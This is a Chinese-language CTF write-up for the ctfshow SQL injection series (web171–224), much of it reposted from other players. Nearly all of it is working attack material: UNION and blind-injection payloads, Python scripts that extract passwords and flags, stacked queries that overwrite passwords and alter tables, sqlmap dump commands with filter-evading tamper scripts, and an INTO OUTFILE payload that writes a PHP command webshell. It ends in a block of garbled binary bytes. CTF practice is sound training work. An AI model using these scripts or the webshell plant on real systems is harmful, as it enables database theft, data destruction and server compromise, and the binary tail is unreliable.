【原创】CTFshow—SQL注入(171—253)

web171

-1' union select 1,database(),1%23

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'%23

[huayang]字段

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' %23

爆flag

-1' union select password,1,2 from ctfshow_user%23

一击必杀

' or 1=1 union select 1,database(),1%23

顺便说一下,感觉Y4tacker师傅有失准确,如果是我理解错了请留言

web172

-1' union select 1,password from ctfshow_user2 where username='flag'%23

方法二

有限制还是可以的

-1' union select password,1 from ctfshow_user2 %23

方法三 Y4tacker师傅

-1' union select to_base64(username),hex(password) from ctfshow_user2 --+

web173

编码绕过哦

-1' union select hex(password),1,2 from ctfshow_user3 %23

web174

听说是盲注哦

先附上一手yq1ng师傅的脚本

import requests
flag = ''
for i in range(1, 45):
    for j in r'0123456789abcdefghijklmnopqrstuvwxyz-{}':
        url = "http://a8e75e2a-2eb7-41a3-960a-025d28f8c09f.chall.ctf.show/api/v4.php?id="
        payload = '''1' and substr((select password from ctfshow_user4 where username="flag"),%d,1)="%c"--+'''% (i,j)
        r = requests.get(url + payload)
        #print(url+payload)
        #print(r.text)
        if 'admin' in r.text:
            flag += j
            print(flag)
            break

等会儿自己写个

啊咧,不会

web175

时间盲注

import requests
import time
url = "http://934fe7e1-b84c-4223-81ed-9268aa9dc3c1.chall.ctf.show/api/v5.php?id=1'"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        payload = "and if(substr((select password from ctfshow_user5 where username='flag'),%d,1) = '%c',sleep(1),0) --+" % (number1,chr(number2))
        current1_time = time.time()
        response = requests.get(url + payload)
        current2_time = time.time()
        current = current2_time - current1_time
        if current >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break

web176

' or 1=1%23

万能密码

web177

1'/**/or/**/1=1%23

web178

1'%09union%09select%091,2,password%09from%09ctfshow_user%23

web179

1'%0cor%0c1=1%23

web180-182

'or(mid(username,1,1)='f')and'1'='1

问就是不知道

web183

# @Author:Y4tacker
import requests
url = 'http://e4349ccf-974a-4b59-b340-cc4d9507d117.chall.ctf.show/select-waf.php'
flagstr = r"{flqazwsxedcrvtgbyhnujmikolp-0123456789}"
res = ""
for i in range(1,46):
    for j in flagstr:
        data = {
            'tableName': f"(ctfshow_user)where(substr(pass,{i},1))regexp('{j}')"
        }
        r = requests.post(url, data=data)
        if '$user_count = 1;' in r.text:
            print(data)
            res += j
            print(res)
            break

等同于

yq1ng师傅

# encoding: utf-8
import requests
url = '''http://898034b5-dc30-4856-9230-a65688cba1ac.chall.ctf.show/select-waf.php'''
data = {"tableName":""}
flag = '}'
s = requests.session()
for x in range(2,50):
    for y in r'abcdefghijklmnopqrstuvwxyz{-}0123456789':
        data["tableName"]="(ctfshow_user)where(right(pass,%d))like'%s'"%(x,y+flag)
        #print(data)
        s = requests.post(url,data = data)
        #print(s.text)
        if '$user_count = 1;' in s.text:
            flag = y + flag
            print(flag)
            break

web184

# @Author:Y4tacker
import requests
url = "http://f15ac2ca-94b7-4257-a52a-00e52ecee805.chall.ctf.show/select-waf.php"
flag = 'flag{'
for i in range(45):
    if i <= 5:
        continue
    for  j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))"
        }
        r = requests.post(url,data=data)
        if r.text.find("$user_count = 43;")>0:
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())#转小写
                if chr(j) == "}":
                    exit(0)
                break

为什么要这么判断

web185-web186

过滤了数字

可以用true构建自己想要的数字

tttttttttql

还有这操作

# @Author:Y4tacker
import requests
url = "http://5e4fd189-577b-46ca-8c62-36c587b88a3f.chall.ctf.show/select-waf.php"
flag = 'flag{'
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num
for i in range(45):
    if i <= 5:
        continue
    for j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"
        }
        r = requests.post(url, data=data)
        if r.text.find("$user_count = 43;") > 0:
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break

其他思路和上题一样

web187

问就是看师傅姿势

https://yq1ng.github.io/z_post/BJDCTF2020%E5%85%A8%E5%AE%B6%E6%A1%B6/#bjdctf2020easy-md5

https://y4tacker.blog.csdn.net/article/details/107813286

注:以下文章相当于转载了以后复习会加些自己的东西。又菜又懒

web188

web189

# Author:Y4tacker
import requests
url = "http://d76c7201-f04e-4872-a71e-ac5f375d77e4.chall.ctf.show/api/"
def getFlagIndex():
    head = 1
    tail = 300
    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'username': "if(locate('flag{'," + "load_file('/var/www/html/api/index.php'))>{0},0,1)".format(str(mid)),
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            head = mid + 1
        else:
            tail = mid
    return mid
def getFlag(num):
    i = int(num)
    result = ""
    while 1:
        head = 32
        tail = 127
        i = i + 1
        while head < tail:
            mid = (head + tail) >> 1
            data = {
                'username': "if(ascii(substr(load_file('/var/www/html/api/index.php'),{0},1))>{1},0,1)".format(str(i),
                                                                                                               str(
                                                                                                                   mid)),
                'password': '1'
            }
            r = requests.post(url, data=data)
            if "密码错误" == r.json()['msg']:
                head = mid + 1
            else:
                tail = mid
            mid += 1
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break
if __name__ == '__main__':
    index = getFlagIndex()
    getFlag(index)

等以后复习的时候再仔细解释

web190

# @Author:Y4tacker
import requests
url = "http://02e6409f-d1ac-41e0-8355-c7e0cb8ca1d8.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # 查flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web191

# @Author:Y4tacker
import requests
url = "http://6b45cf63-6376-4aa1-a618-68a6dcf5fbdb.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # 查flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid
    last = result
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web192

# @Author:Y4tacker
import requests
import string
url = "http://62f3122b-55d1-4f92-b6bb-61aee97320e2.chall.ctf.show/api/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break

web193-194

193

194

脚本

# @Author:Y4tacker
import requests
# 应该还可以用instr等函数,LOCATE、POSITION、INSTR、FIND_IN_SET、IN、LIKE
url = "http://6272c73f-a029-482e-b9d4-7ea07985da1c.chall.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
for i in range(1,45):
    for j in stttr:
        final += j
        # 查表名-ctfshow_flxg
        # payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
        # 查字段-f1ag
        # payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
        payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            print(final)
        else:
            final = final[:-1]

import requests
import string
url = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/ap二i/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
z = 'flag'
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if((select group_concat(f1ag) from ctfshow_fl0g)regexp('{j}'),1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break

web195

username=1;update`ctfshow_user`set`pass`=1;
password=1

web196

username=1;select(1)
password=1

web197-198

username=1;show+tables;
password=ctfshow_user

或是

# @Author:Y4tacker
import requests
url = "http://b0e2784c-4c27-4c2a-8b05-6bcb7492265e.chall.ctf.show/api/"
for i in range(100):
    if i == 0:
        data = {
            'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
                        'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
                        'varchar(255);',
            'password': f'{i}'
        }
        r = requests.post(url, data=data)
    data = {
        'username': '0x61646d696e',
        'password': f'{i}'
    }
    r = requests.post(url, data=data)
    if "登陆成功" in r.json()['msg']:
        print(r.json()['msg'])
        break

不会呀,全是别人的答案啊啊啊

web199-200

username=0;show+tables;
password=ctfshow_user

终于能自己做几道了

web201

这题不用伪造ua

py sqlmap.py -u http://73d92ba3-e4fe-49c1-b5cb-cefb8f75d44d.chall.ctf.show/api/?id=1 --referer=ctf.show --dbs
py sqlmap.py -u http://73d92ba3-e4fe-49c1-b5cb-cefb8f75d44d.chall.ctf.show/api/?id=1 --referer=ctf.show -D ctfshow_web --tables
py sqlmap.py -u http://a517c28e-e14d-48dd-94cb-69e854c5214b.chall.ctf.show/api/?id=1 --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns
py sqlmap.py -u http://a517c28e-e14d-48dd-94cb-69e854c5214b.chall.ctf.show/api/?id=1 --referer=ctf.show -D ctfshow_web -T ctfshow_user -C pass --dump

web202

py sqlmap.py -u http://c9221043-61cc-430e-a7ec-4698e3f372b4.chall.ctf.show/api/ --referer=ctf.show --data=id=1 --dbs
py sqlmap.py -u http://c9221043-61cc-430e-a7ec-4698e3f372b4.chall.ctf.show/api/ --referer=ctf.show --data=id=1 -D ctfshow_web --tables
py sqlmap.py -u http://c9221043-61cc-430e-a7ec-4698e3f372b4.chall.ctf.show/api/ --referer=ctf.show --data=id=1 -D ctfshow_web -T ctfshow_user --columns
py sqlmap.py -u http://c9221043-61cc-430e-a7ec-4698e3f372b4.chall.ctf.show/api/ --referer=ctf.show --data=id=1 -D ctfshow_web -T ctfshow_user -C pass --dump

web203

py sqlmap.py -u "http://6bb1995d-1789-43d6-b56f-7b1239fddb8b.chall.ctf.show//api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain"  -D ctfshow_web -T ctfshow_user -C pass --dump

web204

py sqlmap.py -u http://9b1979c0-0fdd-4157-b718-57f76513a534.chall.ctf.show/api/index.php --cookie=*** --method=PUT --data=id=1 --referer=ctf.show --headers="Content-Type: text/plain"  --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump

记得上kookie值

web205

这里有个很有意思的点就详细说一下

我们先抓一下包

第一个包

第二个

我们把第二个包单独发送会提示

说明在每次请求url/api/index.php之前需要先请求URL/api/getTokn.php

--safe-url 设置在测试目标地址前访问的安全链接
 --safe-freq 设置两次注入测试前访问安全链接的次数

师傅说让我们一步一步来

py sqlmap.py -u http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/getToken.php --safe-freq=1 --dbs

py sqlmap.py -u http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/getToken.php --safe-freq=1 -D ctfshow_web --tables

字段

py sqlmap.py -u http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/getToken.php --safe-freq=1 -D ctfshow_web -T ctfshow_flax --columns

flag

py sqlmap.py -u http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/getToken.php --safe-freq=1 -D ctfshow_web -T ctfshow_flax -C flagx --dump

web206

y4tacker师傅好阔爱呀嘿嘿

作用不大就不说了
也就是sql需要闭合
--prefix=PREFIX     注入payload字符串前缀
--suffix=SUFFIX     注入payload字符串后缀
py sqlmap.py -u http://5e6ed067-d2d1-4554-b13e-575da60d6dbd.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql  --headers="Content-Type: text/plain" --safe-url=http://5e6ed067-d2d1-4554-b13e-575da60d6dbd.chall.ctf.show/api/getToken.php --safe-freq=1 -D ctfshow_web -T ctfshow_flaxc -C flagv --dump

web207-208

#!/usr/bin/env python
"""
name: huayang
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web207-8 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x09)
                continue
            retVal += payload[i]
    return retVal
py sqlmap.py -u "http://ee4ef35c-aa6e-4134-92fb-16c23f2e0dd2.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://ee4ef35c-aa6e-4134-92fb-16c23f2e0dd2.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --tamper=ctfshow.py -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump

y4tacker师傅的方法

py sqlmap.py -u "http://10833ca0-1149-48e4-b256-55f28c60a8c3.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://10833ca0-1149-48e4-b256-55f28c60a8c3.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --current-db --dump --batch --prefix="')" --tamper=space2comment

把库表字段啥都出了

需要手动停止

咱们一步一个脚印

py sqlmap.py -u "http://e28f9875-080f-42c1-874f-49cc5d3391e0.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e28f9875-080f-42c1-874f-49cc5d3391e0.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --prefix="')" --tamper=space2comment --dbs
py sqlmap.py -u "http://e28f9875-080f-42c1-874f-49cc5d3391e0.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e28f9875-080f-42c1-874f-49cc5d3391e0.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --prefix="')" --tamper=space2comment -D ctfshow_web --tables
py sqlmap.py -u "http://eee0ac2f-7143-432f-9af1-254a84e00526.chall.ctf.show//api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://eee0ac2f-7143-432f-9af1-254a84e00526.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --prefix="')" --tamper=space2comment -D ctfshow_web -T ctfshow_flaxca --columns
py sqlmap.py -u "http://eee0ac2f-7143-432f-9af1-254a84e00526.chall.ctf.show//api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://eee0ac2f-7143-432f-9af1-254a84e00526.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --prefix="')" --tamper=space2comment -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump

?累了

web209

#!/usr/bin/env python
"""
Author: huayang
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web209 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue
            elif payload[i] == "*":
                retVal += chr(0x31)
                continue
            elif payload[i] == "=":
                retVal += chr(0x09) + 'LIKE' + chr(0x09)
                continue
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x09)
                continue
            retVal += payload[i]
    return retVal
py sqlmap.py -u "http://b2907f66-9ee5-4dfa-ae0e-679265c4574c.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://b2907f66-9ee5-4dfa-ae0e-679265c4574c.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --prefix="'" --dbms=mysql -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump --batch

web210

#!/usr/bin/env python
"""
Author: huayang
"""
import base64
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web210 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = ""
    if payload:
        retVal = base64.b64encode(payload[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
    return retVal
py sqlmap.py -u "http://dc8c7ec6-bff7-4863-a9ed-fdb374ab6b63.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://dc8c7ec6-bff7-4863-a9ed-fdb374ab6b63.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --dbms=mysql -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump --batch

web211

#!/usr/bin/env python
"""
Author: huayang
"""
import base64
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web211 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = ""
    if payload:
        payload = payload.replace(" ", "/**/")
        retVal = base64.b64encode(payload[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
    return retVal
py sqlmap.py -u "http://3b44b265-781f-45fa-8c85-b0830f16c7b1.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://3b44b265-781f-45fa-8c85-b0830f16c7b1.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --dbms=mysql -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dump --batch

web212

#!/usr/bin/env python
"""
Author: huayang
"""
import base64
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web212 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = ""
    if payload:
        payload = payload.replace(" ", chr(0x09))
        retVal = base64.b64encode(payload[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
    return retVal
py sqlmap.py -u "http://2944196a-5ac2-42d0-8de4-05cb2c90edad.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://2944196a-5ac2-42d0-8de4-05cb2c90edad.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --dbms=mysql -D ctfshow_web -T ctfshow_flavis -C ctfshow_flagxsa --dump --batch

换种方法呢

py sqlmap.py -u "http://2944196a-5ac2-42d0-8de4-05cb2c90edad.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://2944196a-5ac2-42d0-8de4-05cb2c90edad.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --dbms=mysql --current-db --dump --batch

web213

web214

import requests
import time
url = "http://01dcd092-b929-4a5c-be0b-1ad5bffe1292.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        #payload = f'if(substr(database(),{number1},1) = "{chr(number2)}",sleep(1),1)'#可以忽略这步,把这里爆出得库加在下面的database()和table_schema可能会更加准确
        #payload = f'if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = "{chr(number2)}",sleep(2),1)'
        #payload = f'if(substr((select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx" and table_schema="ctfshow_web"),{number1},1) = "{chr(number2)}",sleep(2),1)'
        payload = f"if(substr((select flaga from ctfshow_flagx),{number1},1) = '{chr(number2)}',sleep(1),1)"
        data = {
            'ip':payload,
            'debug':'0'
        }
        # current1_time = time.time()
        response = requests.post(url,data=data)
        #新姿势
        time = response.elapsed.total_seconds()#获取响应时间,单位s
        # current2_time = time.time()
        # current = current2_time - current1_time
        if time >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break

运用group_concat进行拼接会产生的后果

见仁见智吧

web215

就是字符型注入

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://c6778fe7-8d66-4e93-a617-efcdb0c32c18.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        #payload = f"1' or if(substr(database(),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"#可以忽略这步,把这里爆出得库加在下面的database()和table_schema可能会更加准确
        #payload = f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
        #payload = f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc' and table_schema='ctfshow_web'),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
        payload = f"1' or if(substr((select flagaa from ctfshow_flagxc),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"
        data = {
            'ip':payload,
            'debug':'0'
        }
        # current1_time = time.time()
        response = requests.post(url,data=data)
        #新姿势
        time = response.elapsed.total_seconds()#获取响应时间,单位s
        # current2_time = time.time()
        # current = current2_time - current1_time
        if time >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break
# 1' or if(substr(database(),1,1) = "c",sleep(1),1) and '1'='1

web216

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://2054d86a-48f1-4cb2-aaf2-57b193eb3c81.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        #payload = f"'MQ==' or if(substr(database(),{number1},1) = '{chr(number2)}',sleep(1),1)"#可以忽略这步,把这里爆出得库加在下面的database()和table_schema可能会更加准确
        #payload = f"'MQ==' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = '{chr(number2)}',sleep(2),1)"
        #payload = f"'MQ==' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc' and table_schema='ctfshow_web'),{number1},1) = '{chr(number2)}',sleep(2),1)"
        payload = f"'MQ==' or if(substr((select flagaac from ctfshow_flagxcc),{number1},1) = '{chr(number2)}',sleep(1),1)"
        data = {
            'ip':payload,
            'debug':'0'
        }
        # current1_time = time.time()
        response = requests.post(url,data=data)
        #新姿势
        time = response.elapsed.total_seconds()#获取响应时间,单位s
        # current2_time = time.time()
        # current = current2_time - current1_time
        if time >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break

web217

上一手师傅的

"""
Author:Y4tacker
"""
import requests
import time
url = "http://47203814-6435-4a5d-9652-7eab0c963c66.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字
        # payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxccb' limit 1,1"
        # 查数据---不能一次查完越到后面越不准确
        payload = "select flagaabc from ctfshow_flagxccb"
        #flag{7e7c6a3e-a0f8-41cd-b197-1cd-b197-b50f9b3012ab}
        #flag{97ff8fcd-392f-P41h-7290-gP2-167h-D23ggg5
        data = {
            'ip': f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmark(3480500,sha(1)),1",
            'debug':'0'
        }
        try:
            r = requests.post(url, data=data, timeout=1)
            # time.sleep(0.3)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web218-221

web222

还是上师傅的吧,太难了

"""
Author:Y4tacker
"""
import requests
url = "http://a38a5e3f-ff47-4a57-af13-13f92c085734.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字
        # payload = "select column_name from information_schema.columns where table_name='ctfshow_flaga' limit 1,1"
        # 查数据---不能一次查完越到后面越不准确
        payload = "select flagaabc from ctfshow_flaga"
        # flag{b747hfb7-P8e8-
        params = {
            'u': f"concat((if (ascii(substr(({payload}),{i},1))>{mid}, sleep(0.05), 2)), 1);"
        }
        try:
            r = requests.get(url, params=params, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web223

不会不会

"""
Author:Y4tacker
"""
import requests
def generateNum(num):
    res = 'true'
    if num == 1:
        return res
    else:
        for i in range(num - 1):
            res += "+true"
        return res
url = "http://1a3bb281-c99f-4e72-a1b9-0e41c002ed68.chall.ctf.show/api/"
i = 0
res = ""
while 1:
    head = 32
    tail = 127
    i = i + 1
    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库-ctfshow_flagas
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段-flagasabc
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
        # 查flag
        payload = "select flagasabc from ctfshow_flagas"
        params = {
            "u": f"if(ascii(substr(({payload}),{generateNum(i)},{generateNum(1)}))>{generateNum(mid)},username,'a')"
        }
        r = requests.get(url, params=params)
        # print(r.json()['data'])
        if "userAUTO" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        res += chr(head)
    else:
        break
    print(res)

web224

盲猜有robots.txt

登陆进去发现文件上传

看师傅们的不是图片码上传

群文件下载payload.bin进行上传,别解压

C64File"');select 0x3c3f3d60245f4745545b315d603f3e into outfile '/var/www/html/1.php';--+��s��dA�q��y�S�||{9l��1%�Wm�K��v9���H�53#;mv�ܴiS�L5Dv��Qj��AC�=����t��o�������7n�����ee��HO�K��M=��^�]ءo��fH�5fmUe�ʪ�Q�O<�QdS�����.���觖����={3Uo��%�k�>t?.��|a�s�#�J�y;����?��)y��0]���OC��L��8H�iP�;F!�#O?�*_��J�R	Q4IQ������Q��Q4ˢX�x�۠B���h���eʖ4�S!�Y_�gG�
-��E���Zg4�S!�VY���n�
���U��gl%hT�4Bm�(��_�5�Ц�(ڤ(�1vA�:��#�b����0F�Q���x�(c#A�:��Q��(�9�&R�|�6��`�Ţ[����F�"'�bZ@��BN�Q�(�F�$hT�4ByY�gU�
y
G���X�V�BШNi�(
�(�*�E�P�p��M��5�)�Ey�f�S-�Pý����d�2�Fi�����o�r���Ed�_����vđ~�8~�v�6?F����?}���HW�(F8rQ����>lt��lӿ�z������cu�|��}0������w�'m�9�Z]}���S�Zv��U���y�����K���u�;v(�jQ�ޑI(q���)(O���Nߍ���U�HNX}�>��S�m�G_�q�쨹�¯�dO��(���f����͇�V
GF�o���B�j0�m�rxCau�J�GE��$4�ͬ(T����$��n�F*
���ܺNaȳ�0���n58����/�m"�"�Cz4��ƒ(���usC3n�s#������
�i�~$�����Cp�oOd��_�m~n8��y
���A�� (�Z^��+����7�2Bv��L ����"Lżj	jU�����*��2�P>�N�0o������* (3#�(_�Bm���q+B-^��AY���AYA��o���"R|�B���
